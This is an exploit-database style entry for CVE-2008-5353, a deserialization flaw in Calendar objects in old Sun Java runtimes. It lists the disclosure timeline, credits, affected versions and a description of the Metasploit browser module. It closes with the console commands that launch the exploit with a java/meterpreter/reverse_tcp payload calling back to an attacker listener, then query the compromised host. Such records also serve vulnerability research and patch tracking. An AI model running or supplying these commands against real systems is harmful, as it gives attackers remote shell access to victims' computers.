Timeline :

Vulnerability reported by Sami Koivu the 2008-08-01
Vulnerability fixed by Sun the 2008-12-03
PoC provided the 2009-05-19
Metasploit PoC provided by hdm the 2009-06-16

    PoC provided by :

Sami Koivu
sf
hdm

    Reference(s) :

CVE-2008-5353

    Affected version(s) :

JRE & JDK version 6 prior to update 11
JRE & JDK version 5 prior to update 16
JRE & JDK version 1.4.2_18 and prior

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 10

    Description :

This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).

    Commands :

use exploit/multi/browser/java_calendar_dese­rialize
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig